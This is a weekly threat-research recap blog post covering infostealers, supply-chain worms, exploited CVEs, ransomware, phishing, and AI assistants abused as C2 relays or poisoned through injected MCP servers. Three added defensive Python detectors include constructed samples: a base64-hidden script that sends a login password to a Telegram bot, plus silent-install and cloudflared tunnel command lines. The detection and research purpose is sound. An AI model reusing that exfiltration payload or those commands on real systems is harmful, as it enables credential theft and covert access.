Threat Research | Weekly Recap [22 Feb 2026]


Cybersecurity Threat Research ‘Weekly’ Recap: This overview highlights infostealers, RATs, supply-chain and CI/AI toolchain compromises, vulnerabilities, ransomware activity, and phishing campaigns, featuring notable actors and families such as CharlieKirk, XWorm, SANDWORM_MODE, QakBot, and Lynx. It also emphasizes trends like AI-driven C2 abuse, adaptive phishing via Telegram, firmware and mobile backdoors, and notable incidents involving Dell RecoverPoint, Ivanti EPMM, BeyondTrust, and SolarWinds WHD. #CharlieKirk #ArkanixStealer #MIMICRAT #ClickFix #LunarApplication #XWorm #TrustConnect #DocConnect #Foxveil #GrayCharlie #AtlassianJira #SANDWORM_MODE #Notepad++ #LotusBlossom #Chrysalis #UNC6201 #DellRecoverPoint #BeyondTrust #IvantiEPMM #SolarWindsWHD #IngressNGINX #QakBot #SinobiRansomware #LynxRansomware #Keenadu #Velociraptor #Cloudflared #DaisyCloud #Redline

Infostealers & credential theft

  • CharlieKirk — Python Windows infostealer that harvests browser creds, Discord tokens, Wi‑Fi/game artifacts and exfiltrates via GoFile + Telegram/Discord. CharlieKirk Grabber
  • Arkanix Stealer — C++ & Python MaaS infostealer targeting browser credentials and crypto wallets, shipped with a ChromElevator injector; the report also covers the takedown of its panel and payload hosting. Arkanix Stealer
  • Infostealer trend — AhnLab January report: SEO-poisoning, macOS churn, and stealer families moving to ECDH+ChaCha20-Poly1305 C2 crypto. January 2026 Infostealer Trend Report
  • MIMICRAT / ClickFix — Multi-stage site‑compromise chain delivering a native RAT with ETW/AMSI bypass, Lua loader and SOCKS5 tunneling. MIMICRAT / ClickFix
  • Fake Windows 11 ads (LunarApplication) — Paid Facebook ads redirected to counterfeit installers (ms-update32.exe) that install an Electron app to harvest passwords and crypto wallets. Fake Windows 11 / LunarApplication
  • macOS music-plugin loader — Cracked DMG distribution delivering multistage loaders (Odyssey, MacSyncStealer) via obfuscated shell scripts and affiliate tracking. macOS music-plugin loader

RATs, loaders & initial-access campaigns

  • XWorm — New RAT variant delivered via themed phishing/Excel exploits (CVE-2018-0802) and WSH droppers; AES-encrypted C2, plugin architecture for exfiltration, DDoS and ransomware enablement. XWorm campaigns
  • TrustConnect / DocConnect — MaaS posing as RMM (EV-signed installers, web dashboard, $300/mo); disrupted C2 but operator pivoted to DocConnect. TrustConnect / DocConnect
  • Foxveil loader — Initial-stage loader fetching Donut shellcode from Cloudflare/Netlify/Discord, in-memory injection variants and persistence tricks; blocked by SASE controls. Foxveil loader
  • GrayCharlie — WordPress supply‑chain compromises of law‑firm sites injecting JS redirecting to fake updates/ClickFix lures and NetSupport RATs with follow‑on Stealc/SectopRAT. GrayCharlie / NetSupport RAT
  • Spam via Atlassian Jira — Disposable Jira Cloud instances abused to send localized spam using Jira Automation and trusted atlassian.net reputation to bypass email defenses. Atlassian Jira spam abuse

Supply-chain, developer & CI/AI toolchain compromises

  • SANDWORM_MODE — Shai‑Hulud‑style npm worm propagating through typosquat packages and a malicious GitHub Action, harvesting CI/dev secrets and injecting MCP servers to poison AI coding assistants. SANDWORM_MODE npm worm
  • Notepad++ / Lotus Blossom & Chrysalis — Long‑running China‑attributed APT using update‑channel and supply‑chain compromises (Chrysalis backdoor); Elastic automation demonstrated rapid incident confirmation for such campaigns. LotusBlossom / Notepad++ supply‑chain
  • UNC6201 / Dell RecoverPoint — Exploitation of a Dell RecoverPoint zero‑day as a supplier‑side foothold, enabling Tomcat WAR deployment, lateral movement and new backdoors (GRIMBOLT/BRICKSTORM/SLAYSTYLE). UNC6201 / Dell RecoverPoint
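Two checks a defender can run against a repository before the next CI run, motivated by the SANDWORM_MODE item above. This is an added example written for this recap, not code from the original page or from any of the reports it summarises. It flags npm packages that declare install-time lifecycle scripts (a self-propagating npm worm needs code that runs at install time) and GitHub Actions steps whose `uses:` reference is a mutable tag or branch rather than a full commit SHA (a hijacked or malicious action only stays pinned if the SHA is). The function names, the package.json and the workflow are mine; the SHA in the sample is synthetic.

```python
"""Added example (not from the recap or any vendor report): two quick
supply-chain checks.

1. install_hooks():     flag package.json files that declare install-time
                        lifecycle scripts (preinstall/install/postinstall).
2. unpinned_actions():  flag GitHub Actions steps whose `uses:` reference is
                        not pinned to a full 40-hex commit SHA.

Assumptions: package data arrives as a parsed JSON dict and workflow text as
a raw YAML string (no PyYAML needed); the samples below are constructed."""
import json
import re

# Lifecycle scripts that npm runs automatically when a dependency is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def install_hooks(pkg: dict) -> list[tuple[str, str]]:
    """Return (hook, command) pairs for install-time lifecycle scripts."""
    scripts = pkg.get("scripts") or {}
    return [(h, scripts[h]) for h in INSTALL_HOOKS if h in scripts]


# Matches `uses: owner/repo[/subpath]@ref`; local `./path` actions and
# docker:// references do not match and are deliberately ignored.
USES_RE = re.compile(
    r"^\s*-?\s*uses:\s*['\"]?([\w.-]+/[\w.-]+(?:/[\w./-]+)?)@([^\s'\"#]+)", re.M
)
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def unpinned_actions(workflow_yaml: str) -> list[tuple[str, str]]:
    """Return (action, ref) pairs whose ref is not a full commit SHA."""
    return [(a, r) for a, r in USES_RE.findall(workflow_yaml) if not SHA_RE.match(r)]


# Constructed sample package.json modelled on a generic install-hook dropper;
# not a real SANDWORM_MODE artifact.
SAMPLE_PACKAGE = json.loads("""{
  "name": "lodash-utils-helper",
  "version": "4.17.21",
  "scripts": {
    "postinstall": "node setup.js",
    "test": "jest"
  }
}""")

# Constructed sample workflow: one step pinned to a (synthetic) SHA, two
# steps on mutable refs.
SAMPLE_WORKFLOW = """
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: actions/setup-node@v4
        with:
          node-version: 20
      - name: release
        uses: some-org/release-helper@main
      - run: npm ci
"""


def audit() -> dict:
    """Run both checks over the constructed samples."""
    return {
        "install_hooks": install_hooks(SAMPLE_PACKAGE),
        "unpinned_actions": unpinned_actions(SAMPLE_WORKFLOW),
    }


if __name__ == "__main__":
    for name, findings in audit().items():
        print(name, findings)
```

Run it over every package.json under node_modules and every file under .github/workflows; an install hook is not proof of compromise (many native modules build in postinstall), so treat the list as a review queue, and resolve any mutable action ref to its SHA before re-enabling the workflow.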

Vulnerabilities & active exploitation

  • BeyondTrust CVE‑2026‑1731 — Critical pre‑auth RCE in Remote Support exploited to deploy web shells, SparkRAT/VShell and create persistence across sectors; CISA KEV listing and detection guidance available. BeyondTrust CVE‑2026‑1731 exploitation
  • Ivanti EPMM CVEs — CVE‑2026‑1281 & CVE‑2026‑1340 actively exploited for unauthenticated enterprise MDM takeover, mass scanning and Nezha agent/backdoor installs; urgent patching recommended. Ivanti EPMM critical exploits
  • SolarWinds Web Help Desk — Internet‑facing WHD exploitation chain observed since Dec 2025 using MSI installs and legitimate tooling (Velociraptor, Cloudflared) for persistence and tunneling. SolarWinds WHD exploitation
  • Ingress NGINX retirement — Kubernetes Ingress NGINX to be retired after Mar 2026 (no more security fixes); migrate to Gateway API–conformant controllers to avoid exposure (past CVE-2025-1974 example). Ingress NGINX retirement warning
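A detection pass over process-creation events for the post-exploitation chain the SolarWinds Web Help Desk item above describes: a silent MSI install launched from the exposed web application, Velociraptor installed as a service, and cloudflared started as a tunnel. This is an added example for this recap, not code from the original page or from any vendor write-up. The event shape (JSON objects with image, cmdline, parent_image and user) is an assumed EDR/Sysmon-style normalisation, the parent-process list is an assumption to tune per environment, and every event below is constructed.

```python
"""Added example, not from the recap or any vendor write-up: flag three
post-exploitation steps in process-creation telemetry.

Assumed event shape: {"image", "cmdline", "parent_image", "user"} per event,
one JSON object per line. Sample events are constructed."""
import json
import shlex
from pathlib import PureWindowsPath

# Assumption: processes that serve the exposed web application and should
# never spawn an installer. Tune to the environment (java.exe is the usual
# parent for a Java/Tomcat-hosted app).
WEB_PARENTS = {"java.exe", "tomcat9.exe", "w3wp.exe", "httpd.exe"}


def _exe(path: str) -> str:
    """Lower-cased basename of a Windows image path."""
    return PureWindowsPath(path).name.lower()


def classify(event: dict) -> list[str]:
    """Return the detection names that fire on one event (empty if none).

    Matching on image name is enough for the sample; in production pair it
    with signer/hash checks, since both tools are trivially renamed."""
    exe = _exe(event["image"])
    parent = _exe(event.get("parent_image", ""))
    # posix=False keeps Windows backslashes literal; quotes are stripped per token.
    args = [a.strip('"').lower() for a in shlex.split(event["cmdline"], posix=False)]
    hits = []
    if exe == "msiexec.exe" and parent in WEB_PARENTS and any(a in ("/i", "/package") for a in args):
        hits.append("msi_install_from_web_process")
    if exe == "cloudflared.exe" and "tunnel" in args and ("run" in args or "--url" in args):
        hits.append("cloudflared_tunnel_started")
    if exe.startswith("velociraptor") and "service" in args and "install" in args:
        hits.append("velociraptor_service_install")
    return hits


def hunt(lines: list[str]) -> list[tuple[int, str]]:
    """Return (event index, detection name) for every event that fires."""
    return [(i, d) for i, line in enumerate(lines) for d in classify(json.loads(line))]


# Constructed sample events (JSON lines), oldest first. Paths are invented.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Windows\Temp\hd.msi" /qn',
     "parent_image": r"C:\WebApp\jre\bin\java.exe",
     "user": r"NT AUTHORITY\SYSTEM"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\admin\Downloads\7z.msi"',
     "parent_image": r"C:\Windows\explorer.exe",
     "user": r"CORP\admin"},
    {"image": r"C:\ProgramData\vr\velociraptor.exe",
     "cmdline": r'"C:\ProgramData\vr\velociraptor.exe" service install --config "C:\ProgramData\vr\client.config.yaml"',
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "user": r"NT AUTHORITY\SYSTEM"},
    {"image": r"C:\ProgramData\cf\cloudflared.exe",
     "cmdline": r'"C:\ProgramData\cf\cloudflared.exe" tunnel --no-autoupdate --url http://127.0.0.1:8081',
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "user": r"NT AUTHORITY\SYSTEM"},
    {"image": r"C:\ProgramData\cf\cloudflared.exe",
     "cmdline": r'"C:\ProgramData\cf\cloudflared.exe" tunnel list',
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "user": r"CORP\admin"},
]]


if __name__ == "__main__":
    for idx, detection in hunt(SAMPLE_EVENTS):
        print(idx, detection)
```

The first rule is the high-signal one: an installer spawned by the web application's own worker process has no legitimate explanation on an internet-facing Web Help Desk host. The other two fire on legitimate admin activity as well, so scope them to hosts where neither tool is deployed.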

Ransomware, access brokers & dark‑web marketplaces

  • QakBot — Comprehensive IoC analysis names QakBot a top 2026 malware threat: prolific phishing distribution, credential harvest, persistent access and ransomware enablement; downloadable IoC dataset provided. QakBot IoC analysis
  • Sinobi RaaS — New mid‑2025 RaaS rebrand with Lynx/INC code overlap, closed affiliate model and double‑extortion using Rclone exfil and Curve25519/AES encryption. Sinobi ransomware profile
  • Lynx — Post‑access RDP intrusion leading to rapid discovery, lateral movement, temp.sh exfiltration and ransomware deployment tied to Railnet LLC infrastructure. Lynx ransomware (DFIR)
  • Access economy — Overview of underground commoditization of logins, cookies, infostealer logs and backdoors (e.g., Redline, DAISY CLOUD) fueling targeted ransomware and breaches. How cybercriminals buy access

AI‑driven threats & runtime risks

  • AI-in-the-middle C2 — Web‑enabled AI assistants (Grok, Copilot) can be abused as covert C2 relays fetching attacker URLs and returning commands, enabling dynamic AI‑driven malware. AI‑in‑the‑middle C2
  • OpenClaw runtime risk — Self‑hosted agent runtimes that download/execute untrusted “skills” expand the execution boundary and risk host credential/data exposure; isolate and sandbox if evaluated. OpenClaw identity/isolation guidance
  • AI‑driven scams (pig butchering) — Automated malvertising + messaging app chatbots exploit lookalike domains to socially engineer victims in Asia, leveraging RDGA‑generated domains at scale. AI‑driven pig‑butchering scams

Mobile, firmware & platform threats

  • Keenadu — Firmware‑level Android backdoor injected into libandroid_runtime.so / system apps, persists in Zygote, delivers modular encrypted payloads and links to BADBOX/Triada botnets. Keenadu Android backdoor

Phishing, fraud & social engineering

  • Calendar phishing — Spoofed Microsoft/Google Calendar invites with embedded malicious links redirect victims to fake login pages to harvest credentials. Calendar phishing rise
  • Adaptive phishing → Telegram exfil — HTML active attachments emulate login pages and exfiltrate creds + host metadata to attacker Telegram bots via the Bot API. Adaptive phishing / Telegram exfil
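A static triage check for HTML attachments that post harvested credentials to the Telegram Bot API, the technique the adaptive-phishing item above describes. This is an added example for this recap, not code from the original page or from the underlying report. It looks for Bot API calls (https://api.telegram.org/bot<id>:<token>/send...) in the raw markup and inside base64 literals handed to atob(), and pairs that with the presence of a password field. The function names are mine, the attachment is constructed, and the bot token in it is fake.

```python
"""Added example, not from the recap: flag HTML attachments that exfiltrate
form input to a Telegram bot. Sample attachments are constructed."""
import base64
import re

BOT_API_RE = re.compile(
    r"https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]{20,})/(send\w+)"
)
PASSWORD_INPUT_RE = re.compile(r"<input[^>]+type\s*=\s*['\"]?password", re.I)
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")


def _decoded_blobs(html: str):
    """Yield the decoded text of every base64 literal passed to atob()."""
    for blob in ATOB_RE.findall(html):
        try:
            raw = base64.b64decode("".join(blob.split()), validate=True)
        except ValueError:  # not valid base64, skip it
            continue
        yield raw.decode("utf-8", "replace")


def scan_attachment(html: str) -> dict:
    """Return Telegram-exfil indicators for one HTML attachment.

    Only the numeric bot id is reported, never the secret half of the token,
    so the result is safe to write to a ticket or SIEM."""
    layers = [html, *_decoded_blobs(html)]
    hits = [m for layer in layers for m in BOT_API_RE.finditer(layer)]
    harvests_password = any(PASSWORD_INPUT_RE.search(layer) for layer in layers)
    return {
        "bot_ids": sorted({m.group(1) for m in hits}),
        "methods": sorted({m.group(3) for m in hits}),
        "harvests_password": harvests_password,
        "suspicious": bool(hits) and harvests_password,
    }


# Constructed sample: a fake login form whose submit handler is hidden in
# base64 and posts the password plus host metadata to a (fake) bot.
_PAYLOAD_JS = (
    "fetch('https://api.telegram.org/bot123456789:AAFakeTokenForThisExample0123456789/sendMessage',"
    "{method:'POST',body:JSON.stringify({chat_id:'-100987654321',"
    "text:document.getElementById('p').value+' | '+navigator.userAgent})})"
)
SAMPLE_ATTACHMENT = f"""<html><body>
<form id="f"><input name="email" type="text"><input id="p" type="password"></form>
<script>
f.onsubmit = function(e) {{ e.preventDefault(); eval(atob("{base64.b64encode(_PAYLOAD_JS.encode()).decode()}")); }};
</script></body></html>"""

# Constructed benign attachment: no form and no Bot API call.
BENIGN_ATTACHMENT = "<html><body><p>Your invoice is attached.</p></body></html>"


if __name__ == "__main__":
    print(scan_attachment(SAMPLE_ATTACHMENT))
    print(scan_attachment(BENIGN_ATTACHMENT))
```

The bot id that the check returns is the pivot: a mail gateway can block every attachment that references the same id, and the token (which the check deliberately does not log) is what an abuse report to Telegram needs. Attackers also split or XOR-obfuscate the URL, so treat this as a first-pass filter, not a complete detector.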

Research, exploit demonstrations & mitigations

  • False File Immutability (Redux) — Elastic Security Labs PoC shows FFI exploit via Cloud Files driver to modify in‑use executables and achieve kernel code exec; mitigations and detection rules published. FFI (Redux) exploit & mitigations
  • Elastic automation for APTs — Attack Discovery + Workflows + Agent Builder collapsed alerts and automated containment for a Chrysalis/Notepad++ update compromise, demonstrating sub‑4‑minute triage. Automated APT detection & response

Threat Research | Weekly Recap – hendryadrian.com